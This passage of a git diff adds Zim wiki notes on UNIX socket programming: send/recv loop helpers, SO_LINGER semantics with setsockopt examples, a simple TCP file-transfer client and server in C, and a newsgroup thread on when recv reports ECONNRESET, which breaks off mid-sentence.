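One thing the code above does not handle is that send and recv on a stream socket may transfer fewer bytes than requested, so a single recv is not guaranteed to return a whole struct. A common remedy is to loop until the full size has been transferred. The helpers below are a sketch with invented names (send_all, recv_all), not part of the original article.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Keep calling send() until all len bytes are written. 0 on success, -1 on error. */
static int send_all(int fd, const void *buf, size_t len)
{
    const unsigned char *p = buf;
    assert(buf != NULL);
    while (len > 0) {
        ssize_t n = send(fd, p, len, 0);
        if (n < 0) {
            if (errno == EINTR)
                continue;           /* interrupted by a signal, try again */
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Keep calling recv() until exactly len bytes have arrived.
 * Returns 0 on success, -1 on error or if the peer closed early. */
static int recv_all(int fd, void *buf, size_t len)
{
    unsigned char *p = buf;
    assert(buf != NULL);
    while (len > 0) {
        ssize_t n = recv(fd, p, len, 0);
        if (n == 0)
            return -1;              /* connection closed before the full record */
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return 0;
}
```

With these, the sender would call send_all(connect_fd, &info1, sizeof info1) and the receiver recv_all(fd, &clt, sizeof clt), which also removes the intermediate 1024-byte buffers. The layout and byte-order caveats from the earlier notes still apply.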
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
104
Zim/Programme/APUE/setsockopt_:SO_LINGER_选项设置.txt
Normal file
@@ -0,0 +1,104 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-03T21:37:25+08:00
|
||||
|
||||
====== setsockopt: SO LINGER option settings ======
|
||||
Created Friday 03 June 2011
|
||||
http://blog.csdn.net/factor2000/archive/2009/02/23/3929816.aspx
|
||||
|
||||
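This option specifies how the close function behaves for connection-oriented protocols such as TCP. By default the kernel's close returns immediately, and if data remains in the socket send buffer the system tries to deliver it to the peer.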
|
||||
|
||||
The SO_LINGER option changes this default. It uses the following structure:
|
||||
|
||||
struct linger {
|
||||
int l_onoff; /* 0 = off, nonzero = on */
|
||||
int l_linger; /* linger time */
|
||||
};
|
||||
|
||||
|
||||
There are three cases:
|
||||
|
||||
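1. l_onoff is 0: the option is off, l_linger is ignored, and the kernel default applies. **close returns immediately** to the caller, and any unsent data is transmitted if possible. (The call returns at once, but the TCP send buffer of the process may still hold unsent data, so the TCP connection may only close after some delay; this is the normal case, ending in the TIME_WAIT state.)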
|
||||
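2. l_onoff is nonzero and l_linger is 0: TCP aborts the connection when the socket is closed. It discards any data still in the socket send buffer and sends an __RST__ to the peer instead of the usual four-segment termination sequence, which avoids the **TIME_WAIT** state.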
|
||||
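3. l_onoff is nonzero and l_linger is nonzero: the kernel lingers for a while (determined by l_linger) when the socket is closed. If data remains in the socket send buffer, **the process is put to sleep (note that close does not return immediately)** until either (a) all the data has been sent and acknowledged by the peer, after which the normal termination sequence runs (the descriptor's reference count being 0), or (b) the linger time expires. In this case it is very important for the application to check the return value of close: if the time expires before the data has been sent and acknowledged, close returns EWOULDBLOCK and any data left in the socket send buffer is lost. A successful return from close only tells us that the data we sent (and our FIN) has been acknowledged by the peer's TCP; it does not tell us whether the peer application has read the data. If the socket is nonblocking, it does not wait for the close to complete.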
|
||||
|
||||
Note: the unit of l_linger is implementation-dependent: 4.4BSD assumes clock ticks (hundredths of a second), whereas Posix.1g specifies seconds.
|
||||
|
||||
|
||||
The following code is an example of using the SO_LINGER option with a 30-second timeout:
|
||||
#define TRUE 1
|
||||
#define FALSE 0
|
||||
int z; /* Status code*/
|
||||
int s; /* Socket s */
|
||||
struct linger so_linger;
|
||||
...
|
||||
so_linger.l_onoff = TRUE;
|
||||
so_linger.l_linger = 30;
|
||||
z = setsockopt(s,
|
||||
SOL_SOCKET,
|
||||
SO_LINGER,
|
||||
&so_linger,
|
||||
sizeof so_linger);
|
||||
if ( z )
|
||||
perror("setsockopt(2)");
|
||||
|
||||
The following example shows how to set SO_LINGER so that the current connection on socket s is aborted:
|
||||
#define TRUE 1
|
||||
#define FALSE 0
|
||||
int z; /* Status code */
|
||||
int s; /* Socket s */
|
||||
struct linger so_linger;
|
||||
...
|
||||
so_linger.l_onoff = TRUE;
|
||||
so_linger.l_linger = 0;
|
||||
z = setsockopt(s,
|
||||
SOL_SOCKET,
|
||||
SO_LINGER,
|
||||
&so_linger,
|
||||
sizeof so_linger);
|
||||
if ( z )
|
||||
perror("setsockopt(2)");
|
||||
**close(s); /* Abort connection */**
|
||||
|
||||
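In the example above, the connection on socket s is aborted immediately when close is called. __The abort semantics come from setting the timeout value to 0__.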
|
||||
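Normally, when TCP receives data that does not belong to an existing connection (not counting segments whose sequence numbers are merely ahead of what is expected), it automatically sends an RST to the peer, and the application is not aware of it.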
|
||||
An application can, however, abort communication with the peer (with an RST rather than the usual four-way close) by setting l_linger to 0 and then calling close.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
/********** WINDOWS **********/
|
||||
|
||||
|
||||
|
||||
/* When a connection is torn down, closing may need to be delayed (linger) so that all data is transmitted, which is what the SO_LINGER option is for;
|
||||
* //Note: roughly speaking, SO_LINGER controls whether closesocket closes the socket immediately;
|
||||
* struct linger is defined in /usr/include/linux/socket.h: //Note: this is the data structure passed as Data to SetSocketOpt
|
||||
* struct linger
|
||||
* {
|
||||
* int l_onoff; /* Linger active */ //low-order field: zero or nonzero, whether to delay closing the socket
|
||||
* int l_linger; /* How long to linger */ //high-order field: the delay time, in seconds
|
||||
* };
|
||||
* If l_onoff is 0, lingering on close is disabled.
|
||||
|
||||
* If it is nonzero, the socket is allowed to linger on close; the l_linger field gives the linger time
|
||||
*/
|
||||
|
||||
|
||||
In more detail:
|
||||
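1. If SO_LINGER is set (that is, l_onoff in the linger structure is nonzero) with a zero timeout, closesocket() returns immediately without blocking, whether or not queued data has been sent or acknowledged. This is called a "hard" or "abortive" close, because the socket's virtual circuit is reset immediately and any unsent data is lost. A recv() call on the remote side fails with WSAECONNRESET.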
|
||||
|
||||
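2. If SO_LINGER is set with a nonzero timeout, closesocket() blocks the process until the remaining data has been sent or the timeout expires. This is called a "graceful" close. Note that if the socket is nonblocking and SO_LINGER is set with a nonzero timeout, closesocket() returns with the error WSAEWOULDBLOCK.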
|
||||
|
||||
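3. If SO_DONTLINGER is set on a stream socket (that is, l_onoff in the linger structure is zero), closesocket() returns immediately. Queued data is, however, sent if possible before the socket is closed. Note that in this case the Windows Sockets implementation keeps the socket and other resources for an indeterminate time, which can affect applications that expect to use all available sockets.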
|
||||
|
||||
|
||||
SO_DONTLINGER: if true, the SO_LINGER option is disabled.
|
||||
SO_LINGER: delay closing the connection (struct linger). These two options affect the behavior of close;
|
||||
|
||||
|
||||
Option          Interval     Type of close   Waits for close?
|
||||
SO_DONTLINGER   Don't care   Graceful        No
|
||||
SO_LINGER       Zero         Hard            No
|
||||
SO_LINGER       Nonzero      Graceful        Yes
|
||||
187
Zim/Programme/APUE/socket.txt
Normal file
@@ -0,0 +1,187 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T17:01:46+08:00
|
||||
|
||||
====== socket ======
|
||||
Created Wednesday 20 April 2011
|
||||
http://bbs.chinaunix.net/thread-2278881-1-2.html
|
||||
Implementing remote file transfer with TCP/IP programming
|
||||
|
||||
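In TCP/IP networks, to keep the network secure, administrators often add firewall rules on the routers that stop unauthorized users from reaching hosts through riskier TCP/IP protocols such as ftp. Sometimes, however, system maintainers need to use ftp to move files from a host in the central machine room to hosts at front-end branches, for example to replace or upgrade an application. Opening the firewall for every transfer is tedious; adding a dedicated file-transfer module to one's own application would be far more pleasant.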
|
||||
|
||||
UNIX network programs are generally written with the socket system calls. For the widely used client/server model, the steps are as follows:
|
||||
1. The socket system call
|
||||
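To perform network I/O, the first thing the UNIX processes on both the server and the client must do is call socket() to create a socket and specify the appropriate communication protocol. The format is: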
|
||||
#include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
int socket(int family,int type,int protocol)
|
||||
where: (1) family specifies the socket family; its values include:
|
||||
AF_UNIX (UNIX internal protocol family)
|
||||
AF_INET (Internet protocols; TCP/IP programming uses this value)
|
||||
AF_NS (Xerox NS protocols)
|
||||
AF_IMPLINK (IMP link layer)
|
||||
(2) type specifies the socket type; possible values are:
|
||||
SOCK_STREAM (stream socket)
|
||||
SOCK_DGRAM (datagram socket)
|
||||
SOCK_RAW (raw socket)
|
||||
SOCK_SEQPACKET (sequenced packet socket)
|
||||
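In most cases the combination of the first two parameters determines the protocol, and the third parameter is set to 0. If the first parameter is AF_INET and the second is SOCK_STREAM, the protocol is TCP; with SOCK_DGRAM it is UDP; with SOCK_RAW it is IP. Note that not every combination of family and type is valid; consult the relevant documentation for details. On success the call returns something like a file descriptor, called the socket descriptor, on which read and write can perform I/O just as on a file descriptor. When a process has finished with the socket, it must close it with close(<descriptor>) (see below).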
|
||||
2. The bind system call on the server side
|
||||
A newly created socket is not associated with any address; bind() must be called to give it one. The format is:
|
||||
#include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
int bind(int socketfd,struct sockaddr_in *localaddr,int addrlen);
|
||||
where: (1) the first parameter, socketfd, is the socket descriptor returned by the earlier socket() call.
|
||||
(2) the second parameter is a structure holding the local address to bind to; it is defined in sys/netinet/in.h:
|
||||
struct sockaddr_in{
|
||||
short sin_family;/* protocol family used in the socket() call, e.g. AF_INET */
|
||||
u_short sin_port;/* port number in network byte order */
|
||||
struct in_addr sin_addr;/* network address in network byte order */
|
||||
char sin_zero[8];
|
||||
}
|
||||
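Every network program on a machine uses its own port number; for example, telnet uses port 23 and ftp uses port 21. When designing an application, the port number can be obtained from the /etc/services file with getservbyname(), or produced by converting any positive integer to network byte order with htons(int portnum). Some versions of UNIX reserve port numbers below 1024 for the superuser and restrict ordinary user programs to ports 1025 through 32767. The network address can be obtained with gethostbyname(char *hostname) (like getservbyname(), this function returns all the data in its structure in network byte order); hostname is the machine name that corresponds to a network address in /etc/hosts. The function returns a pointer to a hostent structure, which is defined in netdb.h: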
|
||||
struct hostent{
|
||||
char *h_name;
|
||||
char **h_aliases;
|
||||
int h_addrtype;
|
||||
int h_length; /* address length */
|
||||
char **h_addr_list;
|
||||
#define h_addr h_addr_list[0] /* address */
|
||||
}
|
||||
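(3) the third parameter is the length of the structure passed as the second parameter. On success bind returns 0; otherwise it returns -1 and sets errno.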
|
||||
3. The server calls listen to indicate that it is willing to accept connections
|
||||
Format: int listen(int socketfd,int backlog)
|
||||
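It is normally called after socket and bind and before accept. The second parameter specifies how many connection requests the system may queue while waiting for the server to call accept. It is commonly given as 5, which was also the maximum allowed at the time of writing.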
|
||||
4. The server calls accept to wait for a client to connect by calling connect. The format is:
|
||||
int newsocket=accept(int socketfd,struct sockaddr_in *peer,int *addrlen);
|
||||
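This call takes the first connection request off the queue and creates a new socket with the same properties as socketfd. If no connection request is pending, the call blocks the caller until one arrives. On success it fills the peer and addrlen parameters with the peer's address structure and address length; if the client's address is of no interest, pass 0 for both.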
|
||||
5.客户端调用connect()与服务器建立连接。格式为:
|
||||
connect(int socketfd,struct sockaddr_in *servsddr,int addrlen)
|
||||
客户端取得套接字描述符后,用该调用建立与服务器的连接,参数socketfd为socket()系统调用返回的套节字描述符,第二和第三个参数是指向目的地址的结构及以字节计量的目的地址的长度(这里目的地址应为服务器地址)。调用成功返回0,否则将返回-1并设置errno。
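To see the call order socket, bind, listen, connect, accept in one place, here is a small loopback sketch. It assumes a POSIX system with a working loopback interface; listen_loopback and connect_loopback are hypothetical helper names, and port 0 is used so the kernel picks a free port instead of the article's fixed 1500.

```c
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Fill addr with 127.0.0.1 and the given host-order port. */
static void loopback_addr(struct sockaddr_in *addr, unsigned short port)
{
    memset(addr, 0, sizeof(*addr));
    addr->sin_family = AF_INET;
    addr->sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr->sin_port = htons(port);
}

/* Server side: socket, bind, listen. The chosen port is stored in *port.
 * Returns the listening descriptor or -1. */
int listen_loopback(unsigned short *port)
{
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd < 0)
        return -1;
    loopback_addr(&addr, 0);
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(fd, 5) < 0 ||
        getsockname(fd, (struct sockaddr *)&addr, &len) < 0) {
        close(fd);
        return -1;
    }
    *port = ntohs(addr.sin_port);
    return fd;
}

/* Client side: socket, connect. Returns the connected descriptor or -1. */
int connect_loopback(unsigned short port)
{
    struct sockaddr_in addr;
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd < 0)
        return -1;
    loopback_addr(&addr, port);
    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```

The server would then call accept(lfd, NULL, NULL) on the listening descriptor; because the kernel queues the connection (the backlog), connect can complete before accept is called.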
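
6. Sending data through the socket
Once the connection is established, read and write can be used to receive and send data over the network just as with an ordinary file. read takes three arguments: the socket descriptor, the buffer to fill, and the number of bytes to read. It returns the number of bytes actually read, -1 on error, and 0 at end of file (the peer has closed). write also takes three arguments: the socket descriptor, a pointer to the buffer holding the data to send, and the number of bytes to write. It returns the number of bytes actually written, or -1 on error. send and recv can be used on sockets as well; they work like read and write but take one extra flags argument.

7. On exit, close the socket in the normal way. The form is:
int close(int socketfd);

That covers the basic approach and steps of client/server network programming on UNIX. Note that on the system used here the socket calls are not part of the basic system call set; they live in libsocket.a, so programs must be compiled with cc and the -lsocket option. (On Linux and the BSDs these functions are in the standard C library and no extra option is needed.)

Now we can write the program for the problem posed at the start of the article. In the network shown in the figure, for the server in the central machine room to communicate with the clients at the branch, the server needs a route to the clients through router 1112, and both clients need a route to the server through router 2221. The server's /etc/hosts file should contain:
1.1.1.1 server
2.2.2.2 cli1
2.2.2.3 cli2
Each client's /etc/hosts file should list its own address and the server's address; for example, on cli1:
2.2.2.2 cli1
1.1.1.1 server
With the network set up, we write fwq.c on the server: it accepts connection requests from clients and sends them the data read from a source file. The client program khj.c sends a connection request to the server, receives the data the server sends, and writes it to a target file. The source follows:
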
/* Server source: fwq.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(void)
{
    char buf[1024], file[30];
    int source, s, ns;
    ssize_t k;
    socklen_t fromlen;
    struct sockaddr_in sin, from;
    struct hostent *hp;

    system("clear");
    printf("\n");

    printf("\n\n\t\tEnter the name of the file to send: ");
    memset(file, 0, sizeof(file));
    scanf("%29s", file);                /* leave room for the terminating NUL */
    if ((source = open(file, O_RDONLY)) < 0) {
        perror("cannot open source file");
        exit(1);
    }
    printf("\n\t\tSending file, please wait...");
    hp = gethostbyname("server");
    if (hp == NULL) {
        /* gethostbyname reports errors through h_errno, not errno */
        fprintf(stderr, "cannot look up the server address\n");
        exit(2);
    }
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("cannot create socket");
        exit(3);
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(1500);         /* use port 1500 */
    memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
    if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("cannot bind the server address to the socket");
        close(s);
        exit(4);
    }
    if (listen(s, 5) < 0) {
        perror("server: listen");
        exit(5);
    }
    while (1) {
        fromlen = sizeof(from);         /* must be set before every accept */
        if ((ns = accept(s, (struct sockaddr *)&from, &fromlen)) < 0) {
            perror("server: accept");
            exit(6);
        }
        lseek(source, 0L, SEEK_SET);    /* rewind the source file for each new client */
        write(ns, file, sizeof(file));  /* send the file name as a fixed 30-byte field */
        while ((k = read(source, buf, sizeof(buf))) > 0)
            write(ns, buf, k);
        printf("\n\n\t\tTransfer complete.\n");
        close(ns);
    }
    close(source);                      /* not reached: the loop above never exits */
    exit(0);
}

/* Client source: khj.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(void)
{
    char buf[1024], file[30], msg[128];
    int target, s;
    ssize_t k;
    size_t got = 0;
    struct sockaddr_in sin;
    struct hostent *hp;

    system("clear");
    printf("\n");

    hp = gethostbyname("server");
    if (hp == NULL) {
        fprintf(stderr, "cannot look up the server address\n");
        exit(1);
    }
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("cannot create socket");
        exit(2);
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(1500);         /* must match the port used by the server */
    memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
    printf("\n\n\t\tConnecting to the server...");
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("cannot connect to the server");
        exit(3);
    }
    /* receive the file name: a fixed 30-byte field that may arrive in pieces */
    while (got < sizeof(file) &&
           (k = read(s, file + got, sizeof(file) - got)) > 0)
        got += (size_t)k;
    if (got < sizeof(file)) {
        fprintf(stderr, "connection closed before the file name arrived\n");
        exit(5);
    }
    file[sizeof(file) - 1] = '\0';
    if ((target = open(file, O_WRONLY | O_CREAT | O_TRUNC, 0644)) < 0) {
        perror("cannot open target file");
        exit(4);
    }
    /* build the message in a buffer; appending to a string literal is undefined */
    snprintf(msg, sizeof(msg), "\n\n\t\tReceiving file %s, please wait...", file);
    write(1, msg, strlen(msg));
    while ((k = read(s, buf, sizeof(buf))) > 0)
        write(target, buf, k);
    printf("\n\n\t\tFile received.\n");
    close(s);
    close(target);
    return 0;
}

The programs above were tested on SCO UNIX System V 3.2 with the SCO TCP/IP Runtime environment.
411
Zim/Programme/APUE/socket/How_do_you_get_ECONNRESET_on_recv.txt
Normal file
@@ -0,0 +1,411 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T16:36:05+08:00
|
||||
|
||||
====== How do you get ECONNRESET on recv ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://fixunix.com/unix/84635-how-do-you-get-econnreset-recv.html
|
||||
|
||||
The man page for __recv__ and __read__ list the error __ECONNRESET__ as an error
|
||||
condition that happens when "A connection was forcibly closed __by a__
|
||||
__ peer__."~~ I take this to mean that, assuming a TCP connection, if a~~
|
||||
~~ client is recv'ing from a server, and the server suddenly crashes,~~
|
||||
~~ then on the client side recv will return -1 and set errno to~~
|
||||
~~ ECONNRESET.~~
|
||||
|
||||
For the purpose of **robust error handling**, I'm trying to integrate
|
||||
routines to take care of this sort of thing in my program. But I
|
||||
simply** can't actually get recv to return ECONNRESET** in any of my
|
||||
tests. For testing purposes, I set up a simple server and a simple
|
||||
client. The server sends data, and a background thread raises a
|
||||
__SIGSEGV__ while the server is sending, causing the whole program to
|
||||
crash. Meanwhile, the client is recv'ing. But when the server
|
||||
crashes, the client does not issue an ECONNRESET error. Rather, recv
|
||||
__ returns 0 and errno is set to 0__. No error condition is generated at
|
||||
all. But the man page says that recv should only return 0 if "the
|
||||
peer has performed an orderly shutdown". But a SIGSEGV is certainly
|
||||
not my idea of an "orderly shutdown"!
|
||||
|
||||
So, is the behavior of recv in this aspect something that is
|
||||
implementation defined, i.e. not identical across platforms? Maybe
|
||||
some UNIX environments return ECONNRESET on recv, but others don't?
|
||||
Or does recv never return ECONNRESET with TCP?
|
||||
--------------------------------------------------------
|
||||
|
||||
10-04-2007 12:09 AM #2
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
On 2007-08-09, chsalvia@gmail.com wrote:
|
||||
> The man page for recv and read list the error ECONNRESET as an error
|
||||
> condition that happens when "A connection was forcibly closed by a
|
||||
> peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> client is recv'ing from a server, and the server suddenly crashes,
|
||||
> then on the client side recv will return -1 and set errno to
|
||||
> ECONNRESET.
|
||||
|
||||
Well, your understanding is__ probably wrong.__
|
||||
|
||||
The TCP answers with RESET when you try to __send__ some data to peer that
|
||||
does not want to __read__ that data. In other words the peer has __closed__
|
||||
connection or has done __shutdown of reading__.
|
||||
|
||||
Normally, if the peer__ closes__ connection, recv returns 0 without any
|
||||
error. The same applies to the cases when the peer application crashes.
|
||||
|
||||
Now, if you try to send the data to peer after you got 0 from recv,
|
||||
you should get RESET.
|
||||
|
||||
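__ recv returning 0 means the peer has closed the connection (close) or shut down its write side (shutdown(SHUT_WR)).__
If the peer has closed and we send afterwards, we get a RESET segment back.

In the former case (close), when the client sends data the server-side TCP answers with a RESET segment; the error is then reported to the client with errno
**ECONNRESET.**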
|
||||
|
||||
If you try to send the data after you got RESET, you'll __get EPIPE or SIGPIPE__.
|
||||
|
||||
So, theoretically, you can see ECONNRESET in recv only if the peer does
|
||||
__ shutdown(SHUT_RD) __and you try to send some data after this. Which
|
||||
usually never happens. More often the peer__ closes __socket unexpectedly
|
||||
while you are sending many chunks of data and as result you get
|
||||
SIGPIPE, because your first send triggers RESET, and your second send
|
||||
triggers SIGPIPE, because you didn't see the RESET.
|
||||
|
||||
--
|
||||
Minds, like parachutes, function best when open
|
||||
|
||||
|
||||
10-04-2007 12:09 AM #3
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
chsalvia@gmail.com wrote:
|
||||
> The man page for recv and read list the error ECONNRESET as an error
|
||||
> condition that happens when "A connection was forcibly closed by a
|
||||
> peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> client is recv'ing from a server, and the server suddenly crashes,
|
||||
> then on the client side recv will return -1 and set errno to
|
||||
> ECONNRESET.
|
||||
|
||||
Actually no. When the server _system_ suddenly crashes, your
|
||||
application receives nothing.
|
||||
|
||||
ECONNRESET means the connection has received a ReSeT (RST) segment
|
||||
(ostensibly) from the remote TCP. There are a multitude of reasons
|
||||
such a segment could be received, including, but not limited to:
|
||||
|
||||
*) the remote abused SO_LINGER and did an abortive close of the
|
||||
connection
|
||||
|
||||
*) your application sent data which arrived after the remote called
|
||||
shutdown(SHUT_RD) or close()
|
||||
|
||||
*) the remote TCP hit a retransmission limit and aborted (yes, if the
|
||||
data segments weren't getting through the chances of the RST making
|
||||
it are slim, but still non-zero)
|
||||
|
||||
*) there was some actual TCP protocol error between the two systems
|
||||
|
||||
99 times out of ten if the server _application_ terminates
|
||||
(prematurely) the normal close() which happens on almost all platforms
|
||||
will cause TCP to emit a FINished (FIN) segment. That would then be a
|
||||
recv/read return of zero at your end. Of course if your application
|
||||
ignored that and then tried to send something, that brings us to the
|
||||
second bullet item above.
|
||||
|
||||
> But the man page says that recv should only return 0 if "the peer
|
||||
> has performed an orderly shutdown". But a SIGSEGV is certainly not
|
||||
> my idea of an "orderly shutdown"!
|
||||
|
||||
Ah, but as per above, 99 times out of ten, when the OS is cleaning-up
|
||||
after the SIGSEGV'd application, it goes ahead and calls (the moral
|
||||
equivalent to) close(), which unless perhaps the application has set
|
||||
the abortive close SO_LINGER options will result in a FIN being sent.
|
||||
The TCP code doesn't know the difference between a close() from the
|
||||
app making a direct call, the system making a close() call on normal
|
||||
program termination, or one from abnormal termination.
|
||||
|
||||
I suppose you could try setting the SO_LINGER options on the server
|
||||
code to cause an RST when close() is called and then see what killing
|
||||
the process does. Just be sure that you only do that in a debug
|
||||
version and/or have code to put SO_LINGER back the way it should be
|
||||
when doing a "normal" close() in your server app. Hmm, that might be
|
||||
one of the few valid (IMO) reasons to use that otherwise heinous
|
||||
direct-to_RST SO_LINGER option... Perhaps one day I will try that
|
||||
with netperf.
|
||||
|
||||
rick jones
|
||||
--
|
||||
Process shall set you free from the need for rational thought.
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
|
||||
10-04-2007 12:09 AM #4
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Andrei Voropaev writes:
|
||||
> So, theoretically, you can see ECONNRESET in recv only if the peer does
|
||||
> shutdown(SHUT_RD) and you try to send some data after this. Which
|
||||
> usually never happens More often the peer closes socket unexpectedly
|
||||
> while you are sending many chunks of data and as result you get
|
||||
> SIGPIPE, because your first send triggers RESET, and your second send
|
||||
> triggers SIGPIPE, because you didn't see the RESET.
|
||||
|
||||
Actually, a more common cause is that the peer uses the SO_LINGER
|
||||
option, sets l_onoff to 1 (true) and l_linger to 0 (zero time), then
|
||||
closes the socket. On systems that implement BSD sockets properly,
|
||||
that causes the system to emit TCP RST and blow away the connection.
|
||||
Your application will then see ECONNRESET or SIGPIPE or EPIPE,
|
||||
depending on where it was when the message was received.
|
||||
|
||||
--
|
||||
James Carlson, Solaris Networking
|
||||
Sun Microsystems / 1 Network Drive 71.232W Vox +1 781 442 2084
|
||||
MS UBUR02-212 / Burlington MA 01803-2757 42.496N Fax +1 781 442 1677
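
Note: the SO_LINGER case described above can be tried on the loopback interface. The following is a sketch only, assuming a POSIX system (the behavior noted in the comments is what Linux does; other stacks may differ). The function name recv_errno_after_close is invented for this note. With abortive set, the accepted socket is closed with l_onoff = 1 and l_linger = 0, so the kernel sends RST instead of FIN and the client's recv fails; without it, close sends FIN and recv returns 0.

```c
#include <errno.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Connect a client to a loopback listener, close the server side, and
 * report what the client's recv() sees:
 *   0        recv returned 0 (orderly close, FIN)
 *   errno    recv returned -1 (ECONNRESET is expected after an RST)
 *   -1       the test connection could not be set up */
int recv_errno_after_close(int abortive)
{
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);
    struct linger lg;
    char c;
    ssize_t n;
    int lfd, cfd = -1, sfd = -1, result = -1;

    lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;                       /* kernel picks a free port */
    if (bind(lfd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(lfd, 1) < 0 ||
        getsockname(lfd, (struct sockaddr *)&addr, &len) < 0)
        goto out;

    cfd = socket(AF_INET, SOCK_STREAM, 0);
    if (cfd < 0 || connect(cfd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        goto out;
    sfd = accept(lfd, NULL, NULL);
    if (sfd < 0)
        goto out;

    if (abortive) {
        lg.l_onoff = 1;                      /* linger enabled ...            */
        lg.l_linger = 0;                     /* ... with zero time: abort     */
        if (setsockopt(sfd, SOL_SOCKET, SO_LINGER, &lg, sizeof(lg)) < 0)
            goto out;
    }
    close(sfd);                              /* RST if abortive, FIN otherwise */
    sfd = -1;

    n = recv(cfd, &c, 1, 0);                 /* blocks until FIN or RST arrives */
    result = (n < 0) ? errno : 0;
out:
    if (sfd >= 0)
        close(sfd);
    if (cfd >= 0)
        close(cfd);
    close(lfd);
    return result;
}
```

This matches the thread: a plain close (or a crashed process that the kernel cleans up after) shows up as recv returning 0, and ECONNRESET on recv needs an RST from the peer.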
|
||||
|
||||
|
||||
10-04-2007 12:09 AM #5
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
In article ,
|
||||
Rick Jones wrote:
|
||||
|
||||
> chsalvia@gmail.com wrote:
|
||||
> > The man page for recv and read list the error ECONNRESET as an error
|
||||
> > condition that happens when "A connection was forcibly closed by a
|
||||
> > peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> > client is recv'ing from a server, and the server suddenly crashes,
|
||||
> > then on the client side recv will return -1 and set errno to
|
||||
> > ECONNRESET.
|
||||
>
|
||||
> Actually no When the server _system_ suddenly crashes, your
|
||||
> application receives nothing.
|
||||
|
||||
But if you were sending something at the time that it crashed, your
|
||||
system will keep retransmitting. When the system reboots, it will
|
||||
respond to the retransmission with a RST, and this will cause you to get
|
||||
ECONNRESET.
|
||||
|
||||
--
|
||||
Barry Margolin, barmar@alum.mit.edu
|
||||
Arlington, MA
|
||||
*** PLEASE post questions in newsgroups, not directly to me ***
|
||||
*** PLEASE don't copy me on replies, I'll read them in the group ***
|
||||
|
||||
|
||||
10-04-2007 12:09 AM #6
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Barry Margolin wrote:
|
||||
> But if you were sending something at the time that it crashed, you
|
||||
> system will keep retransmitting. When the system reboots, it will
|
||||
> respond to the retransmission with a RST, and this will cause you to
|
||||
> get ECONNRESET.
|
||||
|
||||
I thought one got some sort of timed-out or unreachable errno or
|
||||
somesuch?
|
||||
|
||||
rick jones
|
||||
--
|
||||
No need to believe in either side, or any side. There is no cause.
|
||||
There's only yourself. The belief is in your own precision. - Jobert
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
|
||||
10-04-2007 12:09 AM #7
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
In article ,
|
||||
Rick Jones wrote:
|
||||
|
||||
> Barry Margolin wrote:
|
||||
> > But if you were sending something at the time that it crashed, you
|
||||
> > system will keep retransmitting. When the system reboots, it will
|
||||
> > respond to the retransmission with a RST, and this will cause you to
|
||||
> > get ECONNRESET.
|
||||
>
|
||||
> I thought one got some sort of timed-out or unreachable errno or
|
||||
> somesuch?
|
||||
|
||||
Only if the reboot takes longer than the retransmission limit. In the
|
||||
days when a reboot took several minutes that would be likely, but these
|
||||
days many systems can reboot in under a minute (unless they have to do
|
||||
